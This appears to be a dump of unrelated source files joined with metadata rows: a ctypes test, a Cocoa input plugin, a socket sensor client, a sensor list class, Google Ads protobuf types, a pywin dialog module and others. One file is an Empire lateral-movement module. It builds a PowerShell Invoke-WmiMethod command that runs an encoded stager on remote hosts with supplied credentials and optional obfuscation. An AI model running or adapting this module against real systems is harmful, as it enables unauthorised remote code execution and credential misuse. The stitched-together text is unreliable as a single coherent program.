try:
WINFUNCTYPE
except NameError:
# fake to enable this test on Linux
WINFUNCTYPE = CFUNCTYPE
import _ctypes_test
lib = CDLL(_ctypes_test.__file__)
class CFuncPtrTestCase(unittest.TestCase):
def test_basic(self):
X = WINFUNCTYPE(c_int, c_int, c_int)
def func(*args):
return len(args)
x = X(func)
self.assertEqual(x.restype, c_int)
self.assertEqual(x.argtypes, (c_int, c_int))
self.assertEqual(sizeof(x), sizeof(c_voidp))
self.assertEqual(sizeof(X), sizeof(c_voidp))
def test_first(self):
StdCallback = WINFUNCTYPE(c_int, c_int, c_int)
CdeclCallback = CFUNCTYPE(c_int, c_int, c_int)
def func(a, b):
return a + b
s = StdCallback(func)
c = CdeclCallback(func)
self.assertEqual(s(1, 2), 3)
self.assertEqual(c(1, 2), 3)
# The following no longer raises a TypeError - it is now
# possible, as in C, to call cdecl functions with more parameters.
#self.assertRaises(TypeError, c, 1, 2, 3)
self.assertEqual(c(1, 2, 3, 4, 5, 6), 3)
if not WINFUNCTYPE is CFUNCTYPE and os.name != "ce":
self.assertRaises(TypeError, s, 1, 2, 3)
def test_structures(self):
WNDPROC = WINFUNCTYPE(c_long, c_int, c_int, c_int, c_int)
def wndproc(hwnd, msg, wParam, lParam):
return hwnd + msg + wParam + lParam
HINSTANCE = c_int
HICON = c_int
HCURSOR = c_int
LPCTSTR = c_char_p
class WNDCLASS(Structure):
_fields_ = [("style", c_uint),
("lpfnWndProc", WNDPROC),
("cbClsExtra", c_int),
("cbWndExtra", c_int),
("hInstance", HINSTANCE),
("hIcon", HICON),
("hCursor", HCURSOR),
("lpszMenuName", LPCTSTR),
("lpszClassName", LPCTSTR)]
wndclass = WNDCLASS()
wndclass.lpfnWndProc = WNDPROC(wndproc)
WNDPROC_2 = WINFUNCTYPE(c_long, c_int, c_int, c_int, c_int)
# This is no longer true, now that WINFUNCTYPE caches created types internally.
## # CFuncPtr subclasses are compared by identity, so this raises a TypeError:
## self.assertRaises(TypeError, setattr, wndclass,
## "lpfnWndProc", WNDPROC_2(wndproc))
# instead:
self.assertIs(WNDPROC, WNDPROC_2)
# 'wndclass.lpfnWndProc' leaks 94 references. Why?
self.assertEqual(wndclass.lpfnWndProc(1, 2, 3, 4), 10)
f = wndclass.lpfnWndProc
del wndclass
del wndproc
self.assertEqual(f(10, 11, 12, 13), 46)
def test_dllfunctions(self):
def NoNullHandle(value):
if not value:
raise WinError()
return value
strchr = lib.my_strchr
strchr.restype = c_char_p
strchr.argtypes = (c_char_p, c_char)
self.assertEqual(strchr(b"abcdefghi", b"b"), b"bcdefghi")
self.assertEqual(strchr(b"abcdefghi", b"x"), None)
strtok = lib.my_strtok
strtok.restype = c_char_p
# Neither of this does work: strtok changes the buffer it is passed
## strtok.argtypes = (c_char_p, c_char_p)
## strtok.argtypes = (c_string, c_char_p)
def c_string(init):
size = len(init) + 1
return (c_char*size)(*init)
s = b"a\nb\nc"
b = c_string(s)
## b = (c_char * (len(s)+1))()
## b.value = s
## b = c_string(s)
self.assertEqual(strtok(b, b"\n"), b"a")
self.assertEqual(strtok(None, b"\n"), b"b")
self.assertEqual(strtok(None, b"\n"), b"c")
self.assertEqual(strtok(None, b"\n"), None)
if __name__ == '__main__':
unittest.main()
| bsd-2-clause | -297,175,993,570,968,400 | 29.795276 | 87 | 0.528479 | false |
frohoff/Empire | lib/modules/powershell/lateral_movement/invoke_wmi.py | 2 | 5792 | from lib.common import helpers
class Module:
def __init__(self, mainMenu, params=[]):
self.info = {
'Name': 'Invoke-WMI',
'Author': ['@harmj0y'],
'Description': ('Executes a stager on remote hosts using WMI.'),
'Background' : False,
'OutputExtension' : None,
'NeedsAdmin' : False,
'OpsecSafe' : True,
'Language' : 'powershell',
'MinLanguageVersion' : '2',
'Comments': []
}
# any options needed by the module, settable during runtime
self.options = {
# format:
# value_name : {description, required, default_value}
'Agent' : {
'Description' : 'Agent to run module on.',
'Required' : True,
'Value' : ''
},
'CredID' : {
'Description' : 'CredID from the store to use.',
'Required' : False,
'Value' : ''
},
'ComputerName' : {
'Description' : 'Host[s] to execute the stager on, comma separated.',
'Required' : True,
'Value' : ''
},
'Listener' : {
'Description' : 'Listener to use.',
'Required' : True,
'Value' : ''
},
'UserName' : {
'Description' : '[domain\]username to use to execute command.',
'Required' : False,
'Value' : ''
},
'Password' : {
'Description' : 'Password to use to execute command.',
'Required' : False,
'Value' : ''
},
'UserAgent' : {
'Description' : 'User-agent string to use for the staging request (default, none, or other).',
'Required' : False,
'Value' : 'default'
},
'Proxy' : {
'Description' : 'Proxy to use for request (default, none, or other).',
'Required' : False,
'Value' : 'default'
},
'ProxyCreds' : {
'Description' : 'Proxy credentials ([domain\]username:password) to use for request (default, none, or other).',
'Required' : False,
'Value' : 'default'
}
}
# save off a copy of the mainMenu object to access external functionality
# like listeners/agent handlers/etc.
self.mainMenu = mainMenu
for param in params:
# parameter format is [Name, Value]
option, value = param
if option in self.options:
self.options[option]['Value'] = value
def generate(self, obfuscate=False, obfuscationCommand=""):
listenerName = self.options['Listener']['Value']
userAgent = self.options['UserAgent']['Value']
proxy = self.options['Proxy']['Value']
proxyCreds = self.options['ProxyCreds']['Value']
userName = self.options['UserName']['Value']
password = self.options['Password']['Value']
script = """$null = Invoke-WmiMethod -Path Win32_process -Name create"""
# if a credential ID is specified, try to parse
credID = self.options["CredID"]['Value']
if credID != "":
if not self.mainMenu.credentials.is_credential_valid(credID):
print helpers.color("[!] CredID is invalid!")
return ""
(credID, credType, domainName, userName, password, host, os, sid, notes) = self.mainMenu.credentials.get_credentials(credID)[0]
if domainName != "":
self.options["UserName"]['Value'] = str(domainName) + "\\" + str(userName)
else:
self.options["UserName"]['Value'] = str(userName)
if password != "":
self.options["Password"]['Value'] = password
if not self.mainMenu.listeners.is_listener_valid(listenerName):
# not a valid listener, return nothing for the script
print helpers.color("[!] Invalid listener: " + listenerName)
return ""
else:
# generate the PowerShell one-liner with all of the proper options set
launcher = self.mainMenu.stagers.generate_launcher(listenerName, language='powershell', encode=True, userAgent=userAgent, proxy=proxy, proxyCreds=proxyCreds)
if launcher == "":
return ""
else:
stagerCode = 'C:\\Windows\\System32\\WindowsPowershell\\v1.0\\' + launcher
# build the WMI execution string
computerNames = "\"" + "\",\"".join(self.options['ComputerName']['Value'].split(",")) + "\""
script += " -ComputerName @("+computerNames+")"
script += " -ArgumentList \"" + stagerCode + "\""
# if we're supplying alternate user credentials
if userName != '':
script = "$PSPassword = \""+password+"\" | ConvertTo-SecureString -asPlainText -Force;$Credential = New-Object System.Management.Automation.PSCredential(\""+userName+"\",$PSPassword);" + script + " -Credential $Credential"
script += ";'Invoke-Wmi executed on " +computerNames +"'"
if obfuscate:
script = helpers.obfuscate(psScript=script, obfuscationCommand=obfuscationCommand)
return script
| bsd-3-clause | -6,575,000,725,111,541,000 | 37.872483 | 242 | 0.48826 | false |
MoroGasper/client | client/plugins/ui/cocoa/input.py | 1 | 2315 | # -*- coding: utf-8 -*-
"""Copyright (C) 2013 COLDWELL AG
This program is free software: you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation, either version 3 of the License, or
(at your option) any later version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with this program. If not, see <http://www.gnu.org/licenses/>.
"""
import webbrowser
from gevent.lock import Semaphore
from AppKit import NSObject
from .... import interface, event, ui
from .. import htmlinput
from . import app
current = None
class CocoaInput(htmlinput.Input):
def sethtml(self, html):
app.browserwindow.sethtml(html, self.address, True)
def hide(self):
app.browserwindow.hide()
class BrowserDelegate(NSObject):
def windowShouldClose_(self, noti):
print "close event", current, current.input.close_aborts
ret = None
if current.input.close_aborts:
ret = app.browserwindow.javascript("return closing_window();")
if not ret:
app.browserwindow.hide()
if current:
current.close()
return False
def webView_runJavaScriptAlertPanelWithMessage_initiatedByFrame_(self, webview, message, frame):
# dirty message passing over alert()
cmd, arg = message.split(" ", 1)
if cmd == "tab":
webbrowser.open_new_tab(arg)
else:
print "unknown cmd/arg", cmd, arg
lock = Semaphore()
@event.register('input:done')
def _(*_):
if current:
current.close()
else:
app.browserwindow.hide()
@event.register('input:request')
def input(e, input):
global current
if ui.browser_has_focus():
return
with lock:
l = CocoaInput(input)
current = l
l.greenserver.join()
if l.end == 'OK':
interface.call('input', 'answer', id=input.id, answer=l.serialized)
elif l.end == 'CANCEL':
interface.call('input', 'abort', id=input.id)
| gpl-3.0 | -8,466,254,854,889,940,000 | 29.064935 | 100 | 0.656587 | false |
balucio/smac | bin/sesps.py | 1 | 1406 | #!/usr/bin/python
#-*- coding: utf8 -*-
from __future__ import print_function
import sys
import argparse
import socket
import json
BUFFER_SIZE = 4096
def eprint(*args, **kwargs):
print(*args, file=sys.stderr, **kwargs)
# Controllo argomenti:
# sensor-name, server-address, server-port
parser = argparse.ArgumentParser()
parser.add_argument(
"--name", required=True,
help="name: il nome del sensore da cui ricevere i dati")
parser.add_argument(
"--server", required=False, default="127.0.0.1",
help="server: l'indirizzo o il nome del server da cui ricevere i dati")
parser.add_argument(
"--port", required=False, type=int, nargs='?', default=8080,
help="port: il numero di porta TCP in cui il server è in ascolto")
args = parser.parse_args()
msg = {
"sensore" : args.name,
"operazione": "acquisizione_dati"
}
try:
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((args.server, args.port))
s.send(json.dumps(msg))
data = s.recv(BUFFER_SIZE)
except:
eprint("Errore: Impossibile comunicare con il Remote Collector {}:{}".format(args.server, args.port))
sys.exit(1)
if data == 'KO':
eprint("Errore: RemoteCollector non è stato in grado di elaborare la richiesta")
sys.exit(1)
elif data == "[]":
eprint("Attenzione: Nessuna misurazione in coda per il sensore {}".format(args.name))
sys.exit(2)
print(data)
| gpl-3.0 | 7,828,573,064,611,561,000 | 25 | 105 | 0.678063 | false |
Fellfalla/Thermoberry | Klassen/SensorListe.py | 2 | 7296 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
__author__ = 'Markus Weber'
import Communicator
import Sensor
class SensorListe(list, object):
def __init__(self, iterableInput=None):
if not iterableInput:
iterableInput = []
for element in iterableInput:
self.append(element)
if iterableInput.count(element) > 1: # entferne doppelten input
iterableInput.remove(element)
iterableInput.sort()
super(SensorListe,self).__init__(iterableInput) #CHECK ICH NEEED
def __contains__(self, item):
"""Gibt True zurueck falls name oder Id der uebereinstimmt"""
try:
if item.getID() in self.getAllIDs():
return True
except:
pass
try:
if item.getName() in self.getAllNames():
return True
except:
pass
if item in self.getAllIDs():
return True
elif item in self.getAllNames():
return True
elif super(SensorListe,self).__contains__(item):
return True
return False
def __str__(self):
"""Gibt einen String des Inhaltes zurueck"""
string = ""
for sensor in self:
string += str(sensor) + "\n"
return string
def append(self, p_object):
"""fuegt Sensor hinzu, falls dessen name noch nicht existiert, ansonsten wird der existierende ueberschrieben"""
# Test ob das Eingangsobjekt von der Klasse Sensor ist
if not p_object.__class__.__name__ == Sensor.Sensor.__name__:
print ("Typen in SensorListe.append passen nicht zusammen: ")
print (Sensor.Sensor.__name__)
print (p_object.__class__.__name__)
raise TypeError
# Falls SensorID bereits vorhanden ist: nicht aufnehmen
if p_object.getID() in self:
oldSensor = self.getSensor(identifier=p_object.getID())
self[self.index(oldSensor)]=p_object
else:
super(SensorListe,self).append(p_object)
def getSensorName(self, identifier = None, sensor = None, name = None):
"""gibt den Namen zu einer SensorId zurueck"""
# Erst absuchen nach normalen Werten
if identifier is not None:
for listedSensor in self:
if listedSensor.getID() == identifier:
return listedSensor.getName()
elif sensor is not None:
for listedSensor in self:
if listedSensor is sensor:
return sensor.getName()
elif name is not None:
for listedSensor in self:
if listedSensor.getName() == name:
return listedSensor.getName()
# Dann absuchen ob vllt nach None gesucht wird
try:
for listedSensor in self:
if listedSensor.getID() == identifier:
return listedSensor.getName()
except:
pass
try:
for listedSensor in self:
if listedSensor is sensor:
return listedSensor.getName()
except:
pass
try:
for listedSensor in self:
if listedSensor.getName() == name:
return listedSensor.getName()
except:
pass
raise KeyError()
def getSensorID(self, identifier = None, sensor = None, name = None):
"""gibt die ID zu einer SensorId zurueck"""
# Erst absuchen nach normalen Werten
if identifier is not None:
for listedSensor in self:
if listedSensor.getID() == identifier:
return listedSensor.getID()
elif sensor is not None:
for listedSensor in self:
if listedSensor is sensor:
return sensor.getID()
elif name is not None:
for listedSensor in self:
if listedSensor.getName() == name:
return listedSensor.getID()
# Dann absuchen ob vllt nach None gesucht wird
try:
for listedSensor in self:
if listedSensor.getID() == identifier:
return listedSensor.getID()
except:
pass
try:
for listedSensor in self:
if listedSensor is sensor:
return listedSensor.getID()
except:
pass
try:
for listedSensor in self:
if listedSensor.getName() == name:
return listedSensor.getID()
except:
pass
raise KeyError()
def getSensor(self, identifier=None, sensor=None, name=None):
"""gibt die ID zu einer SensorId zurueck"""
assert identifier is None or sensor is None or name is None, "Only 1 identification argument allowed"
# Erst absuchen nach normalen Werten
if identifier is not None:
for listedSensor in self:
if listedSensor.getID() == identifier:
return listedSensor
elif sensor is not None:
for listedSensor in self:
if listedSensor is sensor:
return sensor
elif name is not None:
for listedSensor in self:
if listedSensor.getName() == name:
return listedSensor
raise KeyError("Sensor id:{id} name:{name} obj:{obj} not found in sensorlist".format(id=identifier, name=name, obj=sensor))
def getAllIDs(self):
"""gibt alle SensorIDs als Liste zurueck"""
IDList = []
for sensor in self:
IDList.append(sensor.getID())
return IDList
def getAllNames(self):
"""gibt alle SensorNamen als Liste zurueck"""
NameList = []
for sensor in self:
NameList.append(sensor.getName())
return NameList
def getAllSensors(self):
sensorList = []
for sensor in self:
sensorList.append(sensor)
return sensorList
def getAllTemperatures(self):
"""Gibt alle Temperaturen als Liste mit absteigenden werten zurueck"""
# self.refreshAllSensorTemperatures()
TemperaturList = []
for sensor in [sensor for sensor in self if sensor.getTemperatur() is not None] :
try:
TemperaturList.append(float(sensor.getTemperatur()))
except ValueError:
pass
except TypeError as e:
print (str(e), 'at: {sensorwert}'.format(sensorwert=sensor.getTemperatur()))
TemperaturList.sort(reverse=True)
return TemperaturList
def refreshAllSensorTemperatures(self):
"""Diese Funktion muss aufgerufen werden, damit die Sensoren ihre Temperaturen aktualisieren"""
for sensor in self:
sensor.refreshTemperatur()
def html(self):
"""Gibt die Sensor als HTML string zurueck"""
html = ''
for sensor in sorted(self):
html += ('<tr id="{sensorname}">{sensor}</tr>\n'.format(sensorname=sensor.getName() , sensor=sensor.html()))
return html
def main():
pass
if __name__ == "__main__":
main() | gpl-2.0 | 631,026,705,849,103,700 | 34.595122 | 131 | 0.559759 | false |
nickkonidaris/kpy | SEDM/SexSpectra.py | 2 | 4288 | import numpy as np
import tempfile
import os
# catalog_name, output_name
sex_params = \
'''
CATALOG_NAME {catalog_name} # name of the output catalog
CATALOG_TYPE ASCII_HEAD # NONE,ASCII,ASCII_HEAD, ASCII_SKYCAT,
# ASCII_VOTABLE, FITS_1.0 or FITS_LDAC
PARAMETERS_NAME /tmp/sex.sex.param # name of the file containing catalog contents
#------------------------------- Extraction ----------------------------------
DETECT_TYPE CCD # CCD (linear) or PHOTO (with gamma correction)
DETECT_MINAREA 30 # minimum number of pixels above threshold
DETECT_THRESH 6.5 # <sigmas> or <threshold>,<ZP> in mag.arcsec-2
ANALYSIS_THRESH 6.5 # <sigmas> or <threshold>,<ZP> in mag.arcsec-2
FILTER N # apply filter for detection (Y or N)?
#FILTER_NAME default.conv # name of the file containing the filter
DEBLEND_NTHRESH 32 # Number of deblending sub-thresholds
DEBLEND_MINCONT 0.005 # Minimum contrast parameter for deblending
CLEAN Y # Clean spurious detections? (Y or N)?
CLEAN_PARAM 1.0 # Cleaning efficiency
MASK_TYPE CORRECT # type of detection MASKing: can be one of
# NONE, BLANK or CORRECT
#------------------------------ Photometry -----------------------------------
PHOT_APERTURES 32 # MAG_APER aperture diameter(s) in pixels
PHOT_AUTOPARAMS 2.5, 3.5 # MAG_AUTO parameters: <Kron_fact>,<min_radius>
PHOT_PETROPARAMS 2.0, 3.5 # MAG_PETRO parameters: <Petrosian_fact>,
# <min_radius>
SATUR_LEVEL 50000.0 # level (in ADUs) at which arises saturation
SATUR_KEY SATURATE # keyword for saturation level (in ADUs)
MAG_ZEROPOINT 0.0 # magnitude zero-point
MAG_GAMMA 4.0 # gamma of emulsion (for photographic scans)
GAIN 0.0 # detector gain in e-/ADU
GAIN_KEY GAIN # keyword for detector gain in e-/ADU
PIXEL_SCALE 1.0 # size of pixel in arcsec (0=use FITS WCS info)
# PIXEL_SCALE set by npk
#------------------------- Star/Galaxy Separation ----------------------------
SEEING_FWHM 2.5 # stellar FWHM in arcsec. Set to 2.5 by NPK
STARNNW_NAME default.nnw # Neural-Network_Weight table filename
#------------------------------ Background -----------------------------------
BACK_SIZE 64,30 # Background mesh: <size> or <width>,<height>
BACK_FILTERSIZE 3 # Background filter: <size> or <width>,<height>
BACKPHOTO_TYPE GLOBAL # can be GLOBAL or LOCAL
#------------------------------ Check Image ----------------------------------
CHECKIMAGE_TYPE -BACKGROUND SEGMENTATION BACKGROUND
# can be NONE, BACKGROUND, BACKGROUND_RMS,
# MINIBACKGROUND, MINIBACK_RMS, -BACKGROUND,
# FILTERED, OBJECTS, -OBJECTS, SEGMENTATION,
# or APERTURES
CHECKIMAGE_NAME s_{output_name} seg_{output_name} back_{output_name}
#--------------------- Memory (change with caution!) -------------------------
MEMORY_OBJSTACK 3000 # number of objects in stack
MEMORY_PIXSTACK 300000 # number of pixels in stack
MEMORY_BUFSIZE 1024 # number of lines in buffer
#----------------------------- Miscellaneous ---------------------------------
VERBOSE_TYPE QUIET # can be QUIET, NORMAL or FULL
WRITE_XML N # Write XML file (Y/N)?
XML_NAME sex.xml # Filename for XML output
'''
def go(paths):
f = open('/tmp/sex.sex.param', 'w')
f.write("NUMBER\n")
f.close()
for path in paths:
name= os.path.basename(path)
c = sex_params.format(**{"catalog_name": "deleteme",
"output_name": name})
conf_file = open("/tmp/sedm_sex_conf.sex","w")
conf_file.write(c)
conf_file.close()
os.system("sex -c /tmp/sedm_sex_conf.sex {0}".format(path))
if __name__ == '__main__':
import sys
go(sys.argv[1:])
| gpl-2.0 | -5,300,213,857,557,513,000 | 35.965517 | 83 | 0.518424 | false |
googleads/google-ads-python | google/ads/googleads/v6/services/types/customer_label_service.py | 1 | 4711 | # -*- coding: utf-8 -*-
# Copyright 2020 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import proto # type: ignore
from google.ads.googleads.v6.resources.types import customer_label
from google.rpc import status_pb2 as status # type: ignore
__protobuf__ = proto.module(
package="google.ads.googleads.v6.services",
marshal="google.ads.googleads.v6",
manifest={
"GetCustomerLabelRequest",
"MutateCustomerLabelsRequest",
"CustomerLabelOperation",
"MutateCustomerLabelsResponse",
"MutateCustomerLabelResult",
},
)
class GetCustomerLabelRequest(proto.Message):
r"""Request message for
[CustomerLabelService.GetCustomerLabel][google.ads.googleads.v6.services.CustomerLabelService.GetCustomerLabel].
Attributes:
resource_name (str):
Required. The resource name of the customer-
abel relationship to fetch.
"""
resource_name = proto.Field(proto.STRING, number=1)
class MutateCustomerLabelsRequest(proto.Message):
r"""Request message for
[CustomerLabelService.MutateCustomerLabels][google.ads.googleads.v6.services.CustomerLabelService.MutateCustomerLabels].
Attributes:
customer_id (str):
Required. ID of the customer whose customer-
abel relationships are being modified.
operations (Sequence[google.ads.googleads.v6.services.types.CustomerLabelOperation]):
Required. The list of operations to perform
on customer-label relationships.
partial_failure (bool):
If true, successful operations will be
carried out and invalid operations will return
errors. If false, all operations will be carried
out in one transaction if and only if they are
all valid. Default is false.
validate_only (bool):
If true, the request is validated but not
executed. Only errors are returned, not results.
"""
customer_id = proto.Field(proto.STRING, number=1)
operations = proto.RepeatedField(
proto.MESSAGE, number=2, message="CustomerLabelOperation",
)
partial_failure = proto.Field(proto.BOOL, number=3)
validate_only = proto.Field(proto.BOOL, number=4)
class CustomerLabelOperation(proto.Message):
r"""A single operation (create, remove) on a customer-label
relationship.
Attributes:
create (google.ads.googleads.v6.resources.types.CustomerLabel):
Create operation: No resource name is
expected for the new customer-label
relationship.
remove (str):
Remove operation: A resource name for the customer-label
relationship being removed, in this format:
``customers/{customer_id}/customerLabels/{label_id}``
"""
create = proto.Field(
proto.MESSAGE,
number=1,
oneof="operation",
message=customer_label.CustomerLabel,
)
remove = proto.Field(proto.STRING, number=2, oneof="operation")
class MutateCustomerLabelsResponse(proto.Message):
r"""Response message for a customer labels mutate.
Attributes:
partial_failure_error (google.rpc.status_pb2.Status):
Errors that pertain to operation failures in the partial
failure mode. Returned only when partial_failure = true and
all errors occur inside the operations. If any errors occur
outside the operations (e.g. auth errors), we return an RPC
level error.
results (Sequence[google.ads.googleads.v6.services.types.MutateCustomerLabelResult]):
All results for the mutate.
"""
partial_failure_error = proto.Field(
proto.MESSAGE, number=3, message=status.Status,
)
results = proto.RepeatedField(
proto.MESSAGE, number=2, message="MutateCustomerLabelResult",
)
class MutateCustomerLabelResult(proto.Message):
r"""The result for a customer label mutate.
Attributes:
resource_name (str):
Returned for successful operations.
"""
resource_name = proto.Field(proto.STRING, number=1)
__all__ = tuple(sorted(__protobuf__.manifest))
| apache-2.0 | -7,649,088,819,946,955,000 | 32.892086 | 124 | 0.680535 | false |
sserrot/champion_relationships | venv/Lib/site-packages/pythonwin/pywin/mfc/dialog.py | 7 | 7931 | """ \
Base class for Dialogs. Also contains a few useful utility functions
"""
# dialog.py
# Python class for Dialog Boxes in PythonWin.
import win32ui
import win32con
# sob - 2to3 doesn't see this as a relative import :(
from pywin.mfc import window
def dllFromDll(dllid):
" given a 'dll' (maybe a dll, filename, etc), return a DLL object "
if dllid==None:
return None
elif type('')==type(dllid):
return win32ui.LoadLibrary(dllid)
else:
try:
dllid.GetFileName()
except AttributeError:
raise TypeError("DLL parameter must be None, a filename or a dll object")
return dllid
class Dialog(window.Wnd):
" Base class for a dialog"
def __init__( self, id, dllid=None ):
""" id is the resource ID, or a template
dllid may be None, a dll object, or a string with a dll name """
# must take a reference to the DLL until InitDialog.
self.dll=dllFromDll(dllid)
if type(id)==type([]): # a template
dlg=win32ui.CreateDialogIndirect(id)
else:
dlg=win32ui.CreateDialog(id, self.dll)
window.Wnd.__init__(self, dlg)
self.HookCommands()
self.bHaveInit = None
def HookCommands(self):
pass
def OnAttachedObjectDeath(self):
self.data = self._obj_.data
window.Wnd.OnAttachedObjectDeath(self)
# provide virtuals.
def OnOK(self):
self._obj_.OnOK()
def OnCancel(self):
self._obj_.OnCancel()
def OnInitDialog(self):
self.bHaveInit = 1
if self._obj_.data:
self._obj_.UpdateData(0)
return 1 # I did NOT set focus to a child window.
def OnDestroy(self,msg):
self.dll = None # theoretically not needed if object destructs normally.
# DDX support
def AddDDX( self, *args ):
self._obj_.datalist.append(args)
# Make a dialog object look like a dictionary for the DDX support
def __bool__(self):
return True
def __len__(self): return len(self.data)
def __getitem__(self, key): return self.data[key]
def __setitem__(self, key, item): self._obj_.data[key] = item# self.UpdateData(0)
def keys(self): return list(self.data.keys())
def items(self): return list(self.data.items())
def values(self): return list(self.data.values())
# XXX - needs py3k work!
def has_key(self, key): return key in self.data
class PrintDialog(Dialog):
" Base class for a print dialog"
def __init__(self, pInfo, dlgID,
printSetupOnly = 0,
flags=(win32ui.PD_ALLPAGES|
win32ui.PD_USEDEVMODECOPIES|
win32ui.PD_NOPAGENUMS|
win32ui.PD_HIDEPRINTTOFILE|
win32ui.PD_NOSELECTION),
parent=None,
dllid=None):
self.dll=dllFromDll(dllid)
if type(dlgID)==type([]): # a template
raise TypeError("dlgID parameter must be an integer resource ID")
dlg=win32ui.CreatePrintDialog(dlgID, printSetupOnly,
flags, parent,
self.dll)
window.Wnd.__init__(self, dlg)
self.HookCommands()
self.bHaveInit = None
self.pInfo = pInfo
# init values (if PrintSetup is called, values still available)
flags = pInfo.GetFlags()
self['toFile'] = (flags&win32ui.PD_PRINTTOFILE != 0)
self['direct'] = pInfo.GetDirect()
self['preview'] = pInfo.GetPreview()
self['continuePrinting'] = pInfo.GetContinuePrinting()
self['curPage'] = pInfo.GetCurPage()
self['numPreviewPages'] = pInfo.GetNumPreviewPages()
self['userData'] = pInfo.GetUserData()
self['draw'] = pInfo.GetDraw()
self['pageDesc'] = pInfo.GetPageDesc()
self['minPage'] = pInfo.GetMinPage()
self['maxPage'] = pInfo.GetMaxPage()
self['offsetPage'] = pInfo.GetOffsetPage()
self['fromPage'] = pInfo.GetFromPage()
self['toPage'] = pInfo.GetToPage()
# these values updated after OnOK
self['copies'] = 0
self['deviceName'] = ''
self['driverName'] = ''
self['printAll'] = 0
self['printCollate'] = 0
self['printRange'] = 0
self['printSelection'] = 0
def OnInitDialog(self):
self.pInfo.CreatePrinterDC() # This also sets the hDC of the pInfo structure.
return self._obj_.OnInitDialog()
def OnCancel(self):
del self.pInfo
def OnOK(self):
'''DoModal has finished. Can now access the users choices'''
self._obj_.OnOK()
pInfo = self.pInfo
# user values
flags = pInfo.GetFlags()
self['toFile'] = (flags&win32ui.PD_PRINTTOFILE != 0)
self['direct'] = pInfo.GetDirect()
self['preview'] = pInfo.GetPreview()
self['continuePrinting'] = pInfo.GetContinuePrinting()
self['curPage'] = pInfo.GetCurPage()
self['numPreviewPages'] = pInfo.GetNumPreviewPages()
self['userData'] = pInfo.GetUserData()
self['draw'] = pInfo.GetDraw()
self['pageDesc'] = pInfo.GetPageDesc()
self['minPage'] = pInfo.GetMinPage()
self['maxPage'] = pInfo.GetMaxPage()
self['offsetPage'] = pInfo.GetOffsetPage()
self['fromPage'] = pInfo.GetFromPage()
self['toPage'] = pInfo.GetToPage()
self['copies'] = pInfo.GetCopies()
self['deviceName'] = pInfo.GetDeviceName()
self['driverName'] = pInfo.GetDriverName()
self['printAll'] = pInfo.PrintAll()
self['printCollate'] = pInfo.PrintCollate()
self['printRange'] = pInfo.PrintRange()
self['printSelection'] = pInfo.PrintSelection()
del self.pInfo
class PropertyPage(Dialog):
" Base class for a Property Page"
def __init__( self, id, dllid=None, caption=0 ):
""" id is the resource ID
dllid may be None, a dll object, or a string with a dll name """
self.dll = dllFromDll(dllid)
if self.dll:
oldRes = win32ui.SetResource(self.dll)
if type(id)==type([]):
dlg=win32ui.CreatePropertyPageIndirect(id)
else:
dlg=win32ui.CreatePropertyPage(id, caption)
if self.dll:
win32ui.SetResource(oldRes)
# dont call dialog init!
window.Wnd.__init__(self, dlg)
self.HookCommands()
class PropertySheet(window.Wnd):
def __init__(self, caption, dll=None, pageList=None ):# parent=None, style,etc):
" Initialize a property sheet. pageList is a list of ID's "
# must take a reference to the DLL until InitDialog.
self.dll=dllFromDll(dll)
self.sheet = win32ui.CreatePropertySheet(caption)
window.Wnd.__init__(self, self.sheet)
if not pageList is None:
self.AddPage(pageList)
def OnInitDialog(self):
return self._obj_.OnInitDialog()
def DoModal(self):
if self.dll:
oldRes = win32ui.SetResource(self.dll)
rc = self.sheet.DoModal()
if self.dll:
win32ui.SetResource(oldRes)
return rc
def AddPage(self, pages):
if self.dll:
oldRes = win32ui.SetResource(self.dll)
try: # try list style access
pages[0]
isSeq = 1
except (TypeError,KeyError):
isSeq = 0
if isSeq:
for page in pages:
self.DoAddSinglePage(page)
else:
self.DoAddSinglePage(pages)
if self.dll:
win32ui.SetResource(oldRes)
def DoAddSinglePage(self, page):
"Page may be page, or int ID. Assumes DLL setup "
if type(page)==type(0):
self.sheet.AddPage(win32ui.CreatePropertyPage(page))
else:
self.sheet.AddPage(page)
# define some app utility functions.
def GetSimpleInput(prompt, defValue='', title=None ):
""" displays a dialog, and returns a string, or None if cancelled.
args prompt, defValue='', title=main frames title """
# uses a simple dialog to return a string object.
if title is None: title=win32ui.GetMainFrame().GetWindowText()
# 2to3 insists on converting 'Dialog.__init__' to 'tkinter.dialog...'
DlgBaseClass = Dialog
class DlgSimpleInput(DlgBaseClass):
def __init__(self, prompt, defValue, title ):
self.title=title
DlgBaseClass.__init__(self, win32ui.IDD_SIMPLE_INPUT)
self.AddDDX(win32ui.IDC_EDIT1,'result')
self.AddDDX(win32ui.IDC_PROMPT1, 'prompt')
self._obj_.data['result']=defValue
self._obj_.data['prompt']=prompt
def OnInitDialog(self):
self.SetWindowText(self.title)
return DlgBaseClass.OnInitDialog(self)
dlg=DlgSimpleInput( prompt, defValue, title)
if dlg.DoModal() != win32con.IDOK:
return None
return dlg['result']
| mit | -3,555,762,980,910,542,300 | 31.908714 | 82 | 0.673181 | false |
abhi11/tanglu-dak | dak/transitions.py | 6 | 21936 | #!/usr/bin/env python
"""
Display, edit and check the release manager's transition file.
@contact: Debian FTP Master <[email protected]>
@copyright: 2008 Joerg Jaspert <[email protected]>
@license: GNU General Public License version 2 or later
"""
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA
################################################################################
